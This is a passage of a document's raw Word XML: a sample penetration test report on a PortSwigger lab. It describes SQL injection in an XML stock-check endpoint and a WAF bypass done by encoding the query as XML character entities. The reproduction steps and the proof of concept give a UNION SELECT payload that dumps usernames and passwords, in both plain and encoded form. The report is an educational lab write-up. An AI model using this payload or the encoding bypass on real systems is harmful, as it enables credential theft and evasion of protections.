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40" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">WEB APPLICATION PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection with WAF Bypass — Full Credential Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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68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rPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Report ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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VAPT-2026-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trP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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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PortSwigger Web Security Academy — Authorized Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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SQL injection with filter bypass via XML encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trP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Engagement Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Web Application Penetration Test (Authorized Lab)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Ameya Panchal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trP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Contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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ameyapanchal.career@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Testing Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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2026-08-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trP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Report Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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2026-08-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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CONFIDENTIAL — Sample Portfolio Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  AUTHORIZED TESTING ONLY — This report was produced against a deliberately vulnerable lab environment provided by PortSwigger Web Security Academy for educational purposes. No unauthorized systems were tested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">During an authorized web application penetration test against the target lab environment, a critical SQL Injection vulnerability was identified in the stock-check functionality. The endpoint accepts user-supplied XML input that is parsed and incorporated into a SQL query without sanitization. A Web Application Firewall (WAF) is deployed in front of the application to block SQL keyword patterns; however, this protection was bypassed by exploiting a parser differential — the WAF inspects raw bytes while the XML parser decodes character entity references before they reach the database.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By encoding the entire SQL payload as XML numeric character references (&amp;#xHH;), the injected UNION SELECT statement was rendered invisible to the WAF but decoded into executable SQL by the application. This resulted in the complete disclosure of all user credentials stored in the database, including the administrator account.</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62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rPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Overall Risk Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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CVSS v3.1 Base Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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9.1 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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CVSS Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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SQL Injection (CWE-89) + WAF Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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A03:2021 – Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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Authentication Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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 — unauthenticated attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Data Exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Full plaintext credential dump (all users)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Complete account takeover, including administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="922B21"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  A WAF is not a fix for SQL injection. The underlying vulnerability must be remediated at the code level using parameterized queries. The WAF was trivially bypassed in this engagement and provides no meaningful protection against a motivated attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Scope &amp; Engagement Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This assessment was performed against the PortSwigger Web Security Academy "SQL injection with filter bypass via XML encoding" lab — a deliberately vulnerable application provided exclusively for authorized security training and research.</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62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rPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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In-Scope Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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POST /product/stock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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Content-Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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application/xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Injection Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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XML body — &lt;storeId&gt; element</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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Backend Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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PostgreSQL (inferred from || concatenation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Testing Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Burp Suite v1.7.34, Manual analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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PortSwigger authorized lab — written consent implied by platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Vulnerability Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1  Vulnerability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Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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rPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Vulnerability ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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VAPT-2026-001-V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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SQL Injection via XML Body with WAF Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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CVSS v3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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CVSS Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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CWE-89: Improper Neutralisation of Special Elements in SQL Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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OWASP Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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A03:2021 – Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>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Affected Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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storeId (XML body of POST /product/stock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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None required — unauthenticated exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2  Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The /product/stock endpoint processes an XML request body. The application parses the &lt;storeId&gt; value and concatenates it directly into a SQL query without sanitization:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT stock FROM products WHERE store_id = &lt;storeId_VALUE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A WAF inspects the raw HTTP request bytes for SQL keywords (UNION, SELECT, FROM, etc.) and returns "Attack Detected" when they are found in plaintext. However, the application passes the XML body through an XML parser before using the value in SQL. The XML parser automatically decodes XML numeric character references (e.g., &amp;#x55; → U) before the value reaches the SQL layer.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This creates a parser differential: the WAF sees encoded gibberish; the XML parser decodes it back to valid SQL. By encoding the entire UNION SELECT payload as hex entity references, an attacker bypasses the WAF completely and executes arbitrary SQL against the backend database.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3  Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following steps reproduce the vulnerability and confirm critical impact:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Intercept the stock-check request using Burp Suite Proxy. The request uses Content-Type: application/xml with a body containing &lt;productId&gt; and &lt;storeId&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Forward the request to Repeater. Inject a test payload into &lt;storeId&gt; to confirm SQL injection. A basic UNION SELECT returns "Attack Detected" from the WAF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Encode the entire SQL payload as XML hex character references. Every character — including spaces and table/column names — must be encoded; partial encoding is detected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 — The target decoded payload is: 1 UNION SELECT username||'~'||password FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 — Place the fully-encoded payload in &lt;storeId&gt; and send the request. The WAF passes the request; the XML parser decodes the payload; the database executes UNION SELECT and returns all rows from the users table concatenated with the stock query result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 — The response body contains all user credentials in plaintext, including the administrator account.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4  Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoded payload injected into &lt;storeId&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;#x31;&amp;#x20;&amp;#x55;&amp;#x4e;&amp;#x49;&amp;#x4f;&amp;#x4e;&amp;#x20;&amp;#x53;&amp;#x45;&amp;#x4c;&amp;#x45;&amp;#x43;&amp;#x54;&amp;#x20;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;#x75;&amp;#x73;&amp;#x65;&amp;#x72;&amp;#x6e;&amp;#x61;&amp;#x6d;&amp;#x65;&amp;#x7c;&amp;#x7c;&amp;#x27;&amp;#x7e;&amp;#x27;&amp;#x7c;&amp;#x7c;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
